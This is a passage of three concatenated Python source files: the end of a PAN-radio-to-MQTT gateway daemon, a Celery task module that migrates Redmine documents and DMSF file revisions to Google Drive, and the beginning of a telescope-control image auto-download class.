self.__log(logging.DEBUG, buf)
def on_message_from_pan (self, mac, key, value, type):
# Radio -> broker path: let plugins veto, look up the uplink topic for
# (mac, key), filter the value, then publish.
self.__log(logging.INFO, "Received message from PAN: %s, %s:%s" % (mac, key, value))
#walk over plugins and determin whether to drop
'''
there are two callback in each plugin
1.on_message_from_pan abstract function in base
description: do something when receives pan event
2.pre_publish
description: do something before publish to broker
'''
for name,p in self.plugins_ins.items():
if not p.on_message_from_pan(mac, key, value, type):
return False
#search the topic
try:
if self.uplink_topics[(mac,key)]:
topic, filter = self.uplink_topics[(mac,key)]
#apply the filter
value_f = value
if filter:
value_f = self.__filter(value, filter)
#walk over plugins and call the callback which watches on the publishment
for name,p in self.plugins_ins.items():
if p.pre_publish:
p.pre_publish(topic, value_f, value)
#publish the topic
self.__log(logging.INFO, "Publishing to topic: %s"%topic)
self.mqtt_client.publish(topic, value_f, self.mqtt_qos, self.mqtt_retain)
except KeyError, e:
self.__log(logging.WARNING, "Received message unrecognized: %s" % e)
def on_message_from_mqtt (self,client, userdata, message):
# Broker -> radio path: let plugins veto, look up the downlink config
# for the topic, filter the payload, then dispatch on the topic type.
self.__log(logging.INFO, "Received message from MQTT: %s: %s, qos %d" % (message.topic,message.payload,message.qos))
#walk over plugins and determin whether to drop
for name,p in self.plugins_ins.items():
if not p.on_message_from_mqtt(message.topic, message.payload, message.qos):
return False
#search the topic
if self.downlink_topics[message.topic]:
mac, topic = self.downlink_topics[message.topic]
#apply the filters
if self.__try_get_config(topic, 'filter', None):
value = self.__filter(message.payload, topic['filter'])
else:
value = message.payload
#handle the topic types
if topic['type'] == 'dio':
self.pan.send_message('dio', mac, value, port = topic['dio_num'])
#self.__log(logging.DEBUG, "sent dio message")
elif topic['type'] == 'data':
self.pan.send_message('data', mac, value)
elif topic['type'] == 'rpc':
pass
elif topic['type'] == 'listening':
#to specified client
self.__resp_topic_list(str(value))
else:
self.__log(logging.ERROR, "Unknown downlink handler type: %s" % topic['type'])
return
else:
self.__log(logging.ERROR,"Received an unknown topic '%s' from mqtt" % message.topic)
return
def do_reload (self):
self.__log(logging.DEBUG, "Reload not implemented now")
def run (self):
# Daemon entry point: parse node config, connect MQTT (with a ~60
# iteration timeout), open the serial PAN radio, start plugins, then
# hand control to the MQTT network loop.
self.__log(logging.INFO, "Starting Pan2Mqtt %s" % self.config['general']['version'])
#parse nodes, up/down-link channels
self.__parse_nodes()
#connect mqtt
self.mqtt_client.connect(self.host, self.config['mqtt']['port'], self.config['mqtt']['keepalive'])
sec=0
while True:
if self.mqtt_connected:
break
else:
self.mqtt_client.loop()
sec=sec+1
if sec > 60:
self.stop()
sys.exit(2)
#connect pan radio
try:
serial = Serial(self.config['pan']['port'], self.config['pan']['baudrate'])
except Exception,e:
self.__log(logging.ERROR, "Can't open serial: %s" % e)
sys.exit(2)
self.pan.serial = serial
if not self.pan.connect():
self.stop()
#start the plugins
for p in self.plugins:
ins = Factory(p)
if ins:
self.plugins_ins[p] = ins
if self.__try_get_config(self.config['plugin'], p, None):
self.plugins_ins[p].config = self.config['plugin'][p]
self.plugins_ins[p].global_config = self.config
self.plugins_ins[p].send_to_pan = self.pan.send_message
self.plugins_ins[p].send_to_mqtt = self.mqtt_client.publish
self.plugins_ins[p].start()
else:
self.__log(logging.ERROR, "Can not make the instance of %s from factory"%p)
#blocking loop
try:
self.mqtt_client.loop_forever()
except KeyboardInterrupt:
self.__log(logging.ERROR, "Terminated by user")
self.cleanup()
def cleanup (self):
# Tear down radio, broker connection, pidfile and plugins, then exit.
self.pan.disconnect()
self.__log(logging.INFO, "Cleaning up...")
self.mqtt_client.disconnect()
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
for name, p in self.plugins_ins.items():
p.cleanup()
sys.exit()
def resolve_path(path):
    """Return *path* unchanged when it is absolute, otherwise resolve it
    relative to the directory containing this script.

    Uses os.path.isabs() instead of inspecting path[0], which crashed with
    IndexError on an empty string and was not portable across platforms.
    """
    if os.path.isabs(path):
        return path
    return os.path.join(os.path.dirname(os.path.realpath(__file__)), path)
if __name__ == '__main__':
    config_file = './pan2mqtt.yaml'
    # file() was removed in Python 3; a context manager guarantees the handle
    # is closed even if YAML parsing fails.  safe_load avoids executing
    # arbitrary object constructors from the config file.
    with open(resolve_path(config_file), 'r') as fh:
        config = yaml.safe_load(fh)
    handler = logging.StreamHandler()
    formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
    handler.setFormatter(formatter)
    logger = logging.getLogger()
    logger.setLevel(config['general']['log_level'])
    logger.addHandler(handler)
    gw = PAN2MQTT(logger, config)
    # daemon-style command dispatch
    if len(sys.argv) == 2:
        if 'start' == sys.argv[1]:
            gw.start()
        elif 'stop' == sys.argv[1]:
            gw.stop()
        elif 'restart' == sys.argv[1]:
            gw.restart()
        elif 'reload' == sys.argv[1]:
            gw.reload()
        elif 'foreground' == sys.argv[1]:
            gw.run()
        else:
            print("Unknown command")
            sys.exit(2)
        sys.exit(0)
    else:
        print("usage: %s start|stop|restart|foreground" % sys.argv[0])
        sys.exit(2)
| |
import os
import random
import datetime
from hashlib import md5
import redis
import simplejson
import celery
import magic
from googleapiclient.http import MediaFileUpload
from celery.utils.log import get_task_logger
from celery import Celery, current_task
from sqlalchemy.exc import IntegrityError
from sqlalchemy import exists, and_
from apiclient import errors
import celeryconfig
from model import *
from db import db_session
from google_api import drive_service
__author__ = 'rdfm'
# Celery task logger for this module.
logger = get_task_logger(__name__)
# Celery application, configured from the local celeryconfig module.
app = Celery()
app.config_from_object('celeryconfig')
# Seed the PRNG from system entropy/time (no fixed seed).
random.seed()
# Shared Redis connection, used by RedmineMigrationTask for distributed locks.
REDIS_CLIENT = redis.Redis()
def get_basedir():
    """Return the Drive id mapped to the Redmine base directory (redmine_id=0),
    or None when no mapping with a drive_id exists yet."""
    mapping = db_session.query(RedmineBasedirToDriveMapping).filter_by(redmine_id=0).first()
    if mapping is None or not mapping.drive_id:
        return None
    return mapping.drive_id
class RedmineMigrationTask(celery.Task):
    """Abstract Celery Task that serializes runs of identical task invocations
    with a Redis lock, and drops the scoped db_session after every run."""
    abstract = True
    # Timeout handed to the Redis lock; redis-py interprets this in seconds.
    lock_expire = 5

    def __init__(self, *a, **kw):
        super(RedmineMigrationTask, self).__init__(*a, **kw)
        self.__lock_key = None
        self.__lock = None
        self.__locked = False

    def lock_key(self, *a, **kw):
        """Build the lock key: task name plus a hash of its arguments."""
        args = a or self.request.args
        kwargs = kw or self.request.kwargs
        digest = md5(simplejson.dumps({'a': args, 'kw': kwargs})).hexdigest()
        return "%s-lock-%s" % (self.name, digest)

    def try_acquire_lock(self, *a, **kw):
        """
        Check if is already locked, if not, lock it
        """
        self.__lock_key = self.lock_key(*a, **kw)
        self.__lock = REDIS_CLIENT.lock(self.__lock_key, timeout=self.lock_expire)
        self.__locked = self.__lock.acquire(blocking=False)
        if self.__locked:
            logger.debug("Lock created for %s." % self.name)
        return self.__locked

    def release_lock(self):
        """Release the Redis lock, but only if this instance actually holds it."""
        if not self.__locked:
            return
        self.__lock.release()
        logger.debug("Released lock for %s with key %s" % (
            self.name, self.__lock_key))

    def after_return(self, status, retval, task_id, args, kwargs, einfo):
        """Celery hook: clean up the db session and the lock after every run."""
        logger.debug("Removing db_session reference and task lock for %s" % self.name)
        db_session.remove()
        self.release_lock()
def get_projects_with_dmsf_revisions():
    """Return all projects owning at least one non-deleted DMSF file revision."""
    has_live_revision = exists().where(
        and_(Project.id == DmsfFileRevision.project_id, DmsfFileRevision.deleted == 0))
    return db_session.query(Project).filter(has_live_revision).all()
def get_projects_with_documents():
    """Return all projects owning at least one Document."""
    has_document = exists().where(Project.id == Document.project_id)
    return db_session.query(Project).filter(has_document).all()
@app.task(base=RedmineMigrationTask)
def update_project_tree_structure():
    """Queue one Drive-creation task per live DMSF revision and per document attachment."""
    live_revisions = db_session.query(DmsfFileRevision).filter_by(deleted=0)
    for rev in live_revisions:
        create_dmsf_revision_on_drive.delay(rev.id, rev.name)
    for att in db_session.query(DocumentAttachment):
        create_document_attachment_on_drive.delay(att.id, att.filename)
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_dmsf_revision_on_drive(self, revision_redmine_id, attachment_name):
    """Upload one DMSF file revision to Drive under its mapped parent folder.

    When the parent folder (or project DMSF root) has no Drive mapping yet,
    its creation is queued and this task retries with a capped backoff.
    Delegates the actual upload to create_single_version_file_on_drive().
    """
    if not revision_redmine_id:
        raise Exception("revision_redmine_id is required")
    if not attachment_name:
        raise Exception("attachment_name is required")
    if not self.try_acquire_lock():
        self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
    revision = db_session.query(DmsfFileRevision).filter_by(id=revision_redmine_id).first()
    if not revision:
        logger.error("No dmsf revision with id %s", revision_redmine_id)
        # was: raise "Bad dmsf revision id passed" % id -- string exceptions are
        # illegal and the format string had no placeholder, so the raise itself
        # crashed with TypeError
        raise Exception("Bad dmsf revision id passed: %s" % revision_redmine_id)
    folder = revision.folder
    logger.debug("revision folder %s", revision.folder)  # was a stray print statement
    if not folder:
        folder = revision.dmsf_file.folder
        logger.debug("file folder %s", revision.dmsf_file.folder)  # was a stray print
    if not folder:
        # place on root DMSF
        if len(revision.project.drive_dmsf) == 0 or not revision.project.drive_dmsf[0].drive_id:
            logger.info("Project DMSF Folder %s has no drive mapping, calling creation, will retry",
                        revision.project.name)
            create_project_dmsf_folder_on_drive.delay(project_redmine_id=revision.project.id,
                                                      project_name=revision.project.name)
            self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
        parent_drive_id = revision.project.drive_dmsf[0].drive_id
    else:
        if len(folder.drive) == 0 or not folder.drive[0].drive_id:
            # use the resolved ``folder`` here: the original re-read
            # revision.dmsf_file.folder, which can be None when the folder came
            # from revision.folder, crashing with AttributeError
            logger.info("DMSF Folder %s has no drive mapping, calling creation, will retry",
                        folder.title)
            create_dmsf_folder_on_drive.delay(folder_redmine_id=folder.id,
                                              folder_name=folder.title)
            self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
        parent_drive_id = folder.drive[0].drive_id
    # prefer the per-project subdirectory, fall back to the flat layout
    local_path = os.path.join(celeryconfig.REDMINE_TO_DRIVE_DMSF_FOLDER,
                              "p_%s" % revision.project.identifier,
                              revision.disk_filename)
    if not os.path.isfile(local_path):
        local_path = os.path.join(celeryconfig.REDMINE_TO_DRIVE_DMSF_FOLDER,
                                  revision.disk_filename)
    if not os.path.isfile(local_path):
        # create_single_version_file_on_drive() will raise on the missing file
        logger.error("File missing %s", local_path)
    filename, file_extension = os.path.splitext(revision.name)
    remote_name = "%s (redmine version %d.%d)%s" % (
        filename, revision.major_version, revision.minor_version, file_extension)
    # single integer encoding of major.minor, e.g. 1.2 -> 10002
    version = (revision.major_version * 10000) + revision.minor_version
    description = "Created from DMSF revision id %s\nTitle: %s\nComment: %s\nDescription: %s" % \
                  (revision.id, revision.title, revision.comment, revision.description)
    return create_single_version_file_on_drive(self,
                                               parent_drive_id=parent_drive_id,
                                               redmine_type="dmsf_file_revision",
                                               redmine_id=revision_redmine_id,
                                               file_name=remote_name,
                                               local_path=local_path,
                                               description=description,
                                               mime_type=revision.mime_type,
                                               version=version,
                                               modified_date=revision.updated_at)
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_document_attachment_on_drive(self, attachment_redmine_id, attachment_name):
    """Upload one Redmine document attachment to its document's Drive folder.

    Queues creation of the document folder mapping and retries with capped
    backoff when the mapping does not exist yet.
    """
    if not attachment_redmine_id:
        raise Exception("attachment_redmine_id is required")
    if not attachment_name:
        raise Exception("attachment_name is required")
    if not self.try_acquire_lock():
        self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
    attachment = db_session.query(DocumentAttachment).filter_by(id=attachment_redmine_id).first()
    if not attachment:
        logger.error("No document attachment with id %s", attachment_redmine_id)
        # was: raise "Bad attachment id passed" % id -- string exceptions are
        # illegal and the format string had no placeholder
        raise Exception("Bad attachment id passed: %s" % attachment_redmine_id)
    if len(attachment.document.drive) == 0 or not attachment.document.drive[0].drive_id:
        logger.info("Document %s has no drive mapping, calling creation, will retry", attachment.document.title)
        create_document_folder_on_drive.delay(document_redmine_id=attachment.document.id,
                                              document_name=attachment.document.title)
        self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
    if attachment.disk_directory:
        local_path = os.path.join(celeryconfig.REDMINE_TO_DRIVE_FILES_FOLDER, attachment.disk_directory,
                                  attachment.disk_filename)
    else:
        local_path = os.path.join(celeryconfig.REDMINE_TO_DRIVE_FILES_FOLDER, attachment.disk_filename)
    return create_single_version_file_on_drive(self,
                                               parent_drive_id=attachment.document.drive[0].drive_id,
                                               redmine_type="document_attachment",
                                               redmine_id=attachment_redmine_id,
                                               file_name=attachment.filename,
                                               local_path=local_path,
                                               description=attachment.description,
                                               mime_type=attachment.content_type,
                                               version=1,
                                               modified_date=attachment.created_on)
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_document_folder_on_drive(self, document_redmine_id, document_name):
    """Create the Drive folder for one Redmine document.

    Requires the project's "Documents" folder mapping; queues its creation
    and retries with capped backoff when it is missing.
    """
    if not document_redmine_id:
        raise Exception("document_redmine_id is required")
    if not document_name:
        raise Exception("document_name is required")
    if not self.try_acquire_lock():
        self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
    document = db_session.query(Document).filter_by(id=document_redmine_id).first()
    if not document:
        logger.error("No document with id %s", document_redmine_id)
        # was: raise "Bad document id passed" % id -- string exceptions are
        # illegal and the format string had no placeholder
        raise Exception("Bad document id passed: %s" % document_redmine_id)
    if len(document.project.drive_documents) == 0 or not document.project.drive_documents[0].drive_id:
        logger.info("Project %s has no drive documents mapping, calling creation, will retry", document.project.name)
        create_project_documents_folder_on_drive.delay(project_redmine_id=document.project.id,
                                                       project_name=document.project.name)
        self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
    return create_folder_on_drive(self, document.project.drive_documents[0].drive_id, 'document',
                                  document_redmine_id, document.title)
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_dmsf_folder_on_drive(self, folder_redmine_id, folder_name):
    """Create the Drive folder for one DMSF folder, under either its parent
    DMSF folder or the project DMSF root; queues missing parent mappings and
    retries with capped backoff.

    NOTE(review): this function is defined twice in this module with an
    identical body; the later definition shadows this one at import time.
    One of the two should be deleted.
    """
    if not folder_redmine_id:
        raise Exception("folder_redmine_id is required")
    if not folder_name:
        raise Exception("folder_name is required")
    if not self.try_acquire_lock():
        self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
    folder = db_session.query(DmsfFolder).filter_by(id=folder_redmine_id).first()
    if not folder:
        logger.error("No DMSF Folder with id %s", folder_redmine_id)
        # was: raise "Bad DMSF id passed" % id -- string exceptions are illegal
        # and the format string had no placeholder
        raise Exception("Bad DMSF id passed: %s" % folder_redmine_id)
    if folder.parent:
        if len(folder.parent.drive) == 0 or not folder.parent.drive[0].drive_id:
            logger.info("Parent DMSF Folder %s of %s has no drive mapping, calling creation, will retry",
                        folder.parent.title, folder.title)
            create_dmsf_folder_on_drive.delay(folder_redmine_id=folder.parent.id, folder_name=folder.parent.title)
            self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
        return create_folder_on_drive(self, folder.parent.drive[0].drive_id, 'dmsf_folder',
                                      folder_redmine_id, folder.title)
    else:
        if len(folder.project.drive_dmsf) == 0 or not folder.project.drive_dmsf[0].drive_id:
            logger.info("Project DMSF Folder %s has no drive mapping, calling creation, will retry",
                        folder.project.name)
            create_project_dmsf_folder_on_drive.delay(project_redmine_id=folder.project.id,
                                                      project_name=folder.project.name)
            self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
        return create_folder_on_drive(self, folder.project.drive_dmsf[0].drive_id, 'dmsf_folder',
                                      folder_redmine_id, folder.title)
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_dmsf_folder_on_drive(self, folder_redmine_id, folder_name):
    """Create the Drive folder for one DMSF folder, under either its parent
    DMSF folder or the project DMSF root; queues missing parent mappings and
    retries with capped backoff.

    NOTE(review): this is a byte-for-byte duplicate of an earlier definition
    in this module; being the later one, this definition wins at import time.
    The duplicate should be removed.
    """
    if not folder_redmine_id:
        raise Exception("folder_redmine_id is required")
    if not folder_name:
        raise Exception("folder_name is required")
    if not self.try_acquire_lock():
        self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
    folder = db_session.query(DmsfFolder).filter_by(id=folder_redmine_id).first()
    if not folder:
        logger.error("No DMSF Folder with id %s", folder_redmine_id)
        # was: raise "Bad DMSF id passed" % id -- string exceptions are illegal
        # and the format string had no placeholder
        raise Exception("Bad DMSF id passed: %s" % folder_redmine_id)
    if folder.parent:
        if len(folder.parent.drive) == 0 or not folder.parent.drive[0].drive_id:
            logger.info("Parent DMSF Folder %s of %s has no drive mapping, calling creation, will retry",
                        folder.parent.title, folder.title)
            create_dmsf_folder_on_drive.delay(folder_redmine_id=folder.parent.id, folder_name=folder.parent.title)
            self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
        return create_folder_on_drive(self, folder.parent.drive[0].drive_id, 'dmsf_folder',
                                      folder_redmine_id, folder.title)
    else:
        if len(folder.project.drive_dmsf) == 0 or not folder.project.drive_dmsf[0].drive_id:
            logger.info("Project DMSF Folder %s has no drive mapping, calling creation, will retry",
                        folder.project.name)
            create_project_dmsf_folder_on_drive.delay(project_redmine_id=folder.project.id,
                                                      project_name=folder.project.name)
            self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
        return create_folder_on_drive(self, folder.project.drive_dmsf[0].drive_id, 'dmsf_folder',
                                      folder_redmine_id, folder.title)
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_project_dmsf_folder_on_drive(self, project_redmine_id, project_name):
    """Create the "DMSF Folders" Drive folder inside a project's Drive folder;
    queues creation of the project folder mapping when it is missing."""
    if not project_redmine_id:
        raise Exception("project_redmine_id is required")
    if not project_name:
        # message fixed: it previously claimed "folder_name is required"
        raise Exception("project_name is required")
    if not self.try_acquire_lock():
        self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
    project = db_session.query(Project).filter_by(id=project_redmine_id).first()
    if not project:
        logger.error("No project with id %s", project_redmine_id)
        # was: raise "Bad project id passed" % id -- string exceptions are
        # illegal and the format string had no placeholder
        raise Exception("Bad project id passed: %s" % project_redmine_id)
    if len(project.drive_project) == 0 or not project.drive_project[0].drive_id:
        logger.info("Project %s has no drive mapping, calling creation, will retry", project.name)
        create_project_folder_on_drive.delay(project_redmine_id=project.id, project_name=project.name)
        self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
    return create_folder_on_drive(self, project.drive_project[0].drive_id, 'project_dmsf',
                                  project_redmine_id, "DMSF Folders")
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_project_documents_folder_on_drive(self, project_redmine_id, project_name):
    """Create the "Documents" Drive folder inside a project's Drive folder;
    queues creation of the project folder mapping when it is missing."""
    if not project_redmine_id:
        raise Exception("project_redmine_id is required")
    if not project_name:
        # message fixed: it previously claimed "folder_name is required"
        raise Exception("project_name is required")
    if not self.try_acquire_lock():
        self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
    project = db_session.query(Project).filter_by(id=project_redmine_id).first()
    if not project:
        logger.error("No project with id %s", project_redmine_id)
        # was: raise "Bad project id passed" % id -- string exceptions are
        # illegal and the format string had no placeholder
        raise Exception("Bad project id passed: %s" % project_redmine_id)
    if len(project.drive_project) == 0 or not project.drive_project[0].drive_id:
        logger.info("Project %s has no drive mapping, calling creation, will retry", project.name)
        create_project_folder_on_drive.delay(project_redmine_id=project.id, project_name=project.name)
        self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
    return create_folder_on_drive(self, project.drive_project[0].drive_id, 'project_docs',
                                  project_redmine_id, "Documents")
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_project_folder_on_drive(self, project_redmine_id, project_name):
    """Create the Drive folder for one project, nested under its parent
    project's folder or under the migration base directory; queues missing
    parent/basedir mappings and retries with capped backoff."""
    if not project_redmine_id:
        raise Exception("project_redmine_id is required")
    if not project_name:
        # message fixed: it previously claimed "folder_name is required"
        raise Exception("project_name is required")
    if not self.try_acquire_lock():
        self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
    project = db_session.query(Project).filter_by(id=project_redmine_id).first()
    if not project:
        logger.error("No project with id %s", project_redmine_id)
        # was: raise "Bad project id passed" % id -- string exceptions are
        # illegal and the format string had no placeholder
        raise Exception("Bad project id passed: %s" % project_redmine_id)
    if project.parent:
        if len(project.parent.drive_project) == 0 or not project.parent.drive_project[0].drive_id:
            logger.info("Parent Project %s of %s has no drive mapping, calling creation, will retry",
                        project.parent.name, project.name)
            create_project_folder_on_drive.delay(project_redmine_id=project.parent_id, project_name=project.parent.name)
            self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
        return create_folder_on_drive(self, project.parent.drive_project[0].drive_id, 'project',
                                      project_redmine_id, project.name)
    else:
        basedir_id = get_basedir()
        if not basedir_id:
            logger.info("Project %s has no parent and basedir is missing, calling creation, will retry", project.name)
            create_basedir.delay()
            self.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
        return create_folder_on_drive(self, basedir_id, 'project',
                                      project_redmine_id, project.name)
@app.task(bind=True, base=RedmineMigrationTask, max_retries=10, rate_limit=None)
def create_basedir(self):
    """Ensure the migration base directory exists on Drive; return its drive id."""
    existing = db_session.query(RedmineBasedirToDriveMapping).filter_by(redmine_id=0).first()
    if existing and existing.drive_id:
        return existing.drive_id
    return create_folder_on_drive(self, 'root', 'basedir', 0, celeryconfig.REDMINE_TO_DRIVE_BASE_DIR)
def create_folder_on_drive(task, parent_drive_id, redmine_type, redmine_id, folder_name):
    """Create (or adopt) a Drive folder for a Redmine entity and persist the
    mapping.

    First records a RedmineToDriveMapping row (retrying the calling task on a
    duplicate-insert race), then pages through the parent's children on Drive:
    an existing folder with the same title is adopted, otherwise a new folder
    is created.  Returns the resulting drive id, or None when the entity was
    already mapped.
    """
    if not parent_drive_id:
        raise Exception("parent_drive_id is required")
    if not redmine_type:
        raise Exception("redmine_type is required")
    if redmine_id is None:
        raise Exception("redmine_id is required")
    if not folder_name:
        raise Exception("folder_name is required")
    db_mapping = db_session.query(RedmineToDriveMapping).filter_by(redmine_id=redmine_id).filter_by(
        mapping_type=redmine_type).first()
    if db_mapping and db_mapping.drive_id:
        logger.info("Folder %s already mapped to %s", folder_name, db_mapping.drive_id)
        return
    if not db_mapping:
        try:
            db_mapping = RedmineToDriveMapping(redmine_id=redmine_id, mapping_type=redmine_type,
                                               last_update=datetime.datetime.utcnow())
            db_session.add(db_mapping)
            db_session.commit()
            logger.info("Created mapping for %s %s id:%s", redmine_type, folder_name, redmine_id)
        except IntegrityError as e:  # was the py2-only "except IntegrityError, e" syntax
            logger.info("Cannot create mapping due to duplicate, will retry: %s", e)
            db_session.rollback()
            task.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
    page_token = None
    # NOTE(review): HttpError is logged and the loop retries forever with no
    # backoff; consider bounding retries or sleeping between attempts.
    while True:
        try:
            param = {
                'q': "title='%s'" % folder_name,
            }
            if page_token:
                param['pageToken'] = page_token
            children = drive_service.children().list(folderId=parent_drive_id, **param).execute()
            for child in children.get('items', []):
                # adopt the first existing folder with this title
                # (renamed from the original, which clobbered ``redmine_id``)
                found_drive_id = child['id']
                logger.info("Found remote folder %s with id %s, adding to db", folder_name, found_drive_id)
                db_mapping.drive_id = found_drive_id
                db_mapping.last_update = datetime.datetime.utcnow()
                db_session.commit()
                return found_drive_id
            page_token = children.get('nextPageToken')
            if not page_token:
                logger.info("Creating drive folder for %s %s id:%s", redmine_type, folder_name, redmine_id)
                # Create a folder on Drive, returns the newly created folder's ID
                body = {
                    'title': folder_name,
                    'mimeType': "application/vnd.google-apps.folder",
                    'parents': [{'id': parent_drive_id}]
                }
                m_folder = drive_service.files().insert(body=body).execute()
                db_mapping.drive_id = m_folder['id']
                db_session.commit()
                logger.info("Created drive folder for %s %s id:%s", redmine_type, folder_name, redmine_id)
                return db_mapping.drive_id
        except errors.HttpError as error:  # was the py2-only "except errors.HttpError, error" syntax
            logger.info("Cannot create drive folder for %s %s id:%s: %s", redmine_type, folder_name, redmine_id,
                        error)
def create_single_version_file_on_drive(task, parent_drive_id, redmine_type, redmine_id,
                                        file_name, local_path, description, mime_type,
                                        version, modified_date):
    """Upload a local file to Drive under parent_drive_id and persist the
    mapping.

    Mirrors create_folder_on_drive(): records the mapping row first (retrying
    the calling task on a duplicate-insert race), then adopts an existing
    remote file with the same title or uploads a new one.  Returns the
    resulting drive id, or None when the entity was already mapped.
    ``description`` and ``mime_type`` may be None.
    """
    if not parent_drive_id:
        raise Exception("parent_drive_id is required")
    if not redmine_type:
        raise Exception("redmine_type is required")
    if redmine_id is None:
        raise Exception("redmine_id is required")
    if not file_name:
        # message fixed: it previously claimed "folder_name is required"
        raise Exception("file_name is required")
    if not local_path:
        raise Exception("local_path is required")
    if not os.path.isfile(local_path):
        raise Exception("local_path %s is missing" % local_path)
    db_mapping = db_session.query(RedmineToDriveMapping).filter_by(redmine_id=redmine_id).filter_by(
        mapping_type=redmine_type).first()
    if db_mapping and db_mapping.drive_id:
        logger.info("File %s already mapped to %s", file_name, db_mapping.drive_id)
        return
    if not db_mapping:
        try:
            db_mapping = RedmineToDriveMapping(redmine_id=redmine_id, mapping_type=redmine_type,
                                               last_update=datetime.datetime.utcnow())
            db_session.add(db_mapping)
            db_session.commit()
            logger.info("Created mapping for %s %s id:%s", redmine_type, file_name, redmine_id)
        except IntegrityError as e:  # was the py2-only "except IntegrityError, e" syntax
            logger.info("Cannot create mapping due to duplicate, will retry: %s", e)
            db_session.rollback()
            task.retry(countdown=min(2 + (2 * current_task.request.retries), 128))
    page_token = None
    # NOTE(review): HttpError is logged and the loop retries forever with no
    # backoff; consider bounding retries or sleeping between attempts.
    while True:
        try:
            param = {
                'q': "title='%s'" % file_name,
            }
            if page_token:
                param['pageToken'] = page_token
            children = drive_service.children().list(folderId=parent_drive_id, **param).execute()
            for child in children.get('items', []):
                # adopt the first existing file with this title
                # (renamed from the original, which clobbered ``redmine_id``)
                found_drive_id = child['id']
                logger.info("Found remote file %s with id %s, adding to db", file_name, found_drive_id)
                db_mapping.drive_id = found_drive_id
                db_mapping.last_update = datetime.datetime.utcnow()
                db_session.commit()
                return found_drive_id
            page_token = children.get('nextPageToken')
            if not page_token:
                logger.info("Creating file for %s %s id:%s", redmine_type, file_name, redmine_id)
                if not mime_type or mime_type == '':
                    mime_type = magic.from_file(local_path, mime=True)
                    logger.info("Replaced missing mimetype for %s to %s", file_name, mime_type)
                # Create the file on Drive
                media_body = MediaFileUpload(local_path, mimetype=mime_type, resumable=True)
                body = {
                    'title': file_name,
                    'mimeType': mime_type
                }
                if modified_date:
                    body['modifiedDate'] = modified_date.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
                # guard against None: several callers pass nullable description
                # columns, and None + str raised TypeError here
                body['description'] = (description or "") + "\nCreated from %s id %s" % (redmine_type, redmine_id)
                body['version'] = version
                body['parents'] = [{'id': parent_drive_id}]
                m_file = drive_service.files().insert(body=body, media_body=media_body,
                                                      useContentAsIndexableText=True,
                                                      pinned=True).execute()
                db_mapping.drive_id = m_file['id']
                db_session.commit()
                logger.info("Created file for %s %s id:%s", redmine_type, file_name, redmine_id)
                return db_mapping.drive_id
        except errors.HttpError as error:  # was the py2-only "except errors.HttpError, error" syntax
            logger.info("Cannot create file for %s %s id:%s: %s", redmine_type, file_name, redmine_id,
                        error)
| |
"""Code to auto-download images.
Note: instantiate only one of these per instrument, regardless of how many copies
of ExposeStatusWdg there are, to avoid downloading duplicate images.
2009-05-05 ROwen Extracted from ExposeModel.py and improved to support various modes
2009-05-06 ROwen    Modified to use getEvery download preference instead of autoGet.
2009-07-09 ROwen Removed unused import of Tkinter (found by pychecker).
Removed unusable test code (found by pychecker).
2011-06-16 ROwen Ditched obsolete "except (SystemExit, KeyboardInterrupt): raise" code
2011-07-21 ROwen Renamed instModel to exposeModel for improved clarity.
2011-07-27 ROwen Updated for new location of HubModel.
2012-08-10 ROwen Updated for RO.Comm 3.0.
2014-09-17 ROwen Bug fix: __all__ was mis-set.
"""
__all__ = ['FileGetter']
import collections
import os
import sys
import RO.Alg
import RO.Astro.ImageWindow
import RO.CnvUtil
import RO.DS9
import RO.KeyVariable
import RO.SeqUtil
import RO.StringUtil
import TUI.TUIModel
import TUI.Models.HubModel
class FileGetter (object):
    """Auto-download images for one instrument.

    Listens to the expose model's ``files`` keyword and queues HTTP downloads
    through the TUI download widget, honoring the user's "get every Nth image"
    preference; optionally displays finished downloads in ds9.
    Instantiate only one per instrument to avoid duplicate downloads.
    """
    def __init__(self, exposeModel):
        """Construct a FileGetter bound to *exposeModel* (one instrument)."""
        self.exposeModel = exposeModel
        self.instName = self.exposeModel.instName
        # camName -> RO.DS9.DS9Win, created lazily on first display
        self.ds9WinDict = {}
        self.hubModel = TUI.Models.HubModel.getModel()
        self.tuiModel = TUI.TUIModel.getModel()
        # set of active downloads; each entry is an HTTPGet object
        self.activeDownloads = set()
        # queue of pending downloads; each entry is a list of keyword argument dictionaries
        # for the download widget's getFile method (one dict per camera, e.g. red and blue for DIS)
        self.pendingDownloadArgs = collections.deque()
        self.nSkipped = 0
        downloadTL = self.tuiModel.tlSet.getToplevel("TUI.Downloads")
        self.downloadWdg = downloadTL and downloadTL.getWdg()
        if self.downloadWdg:
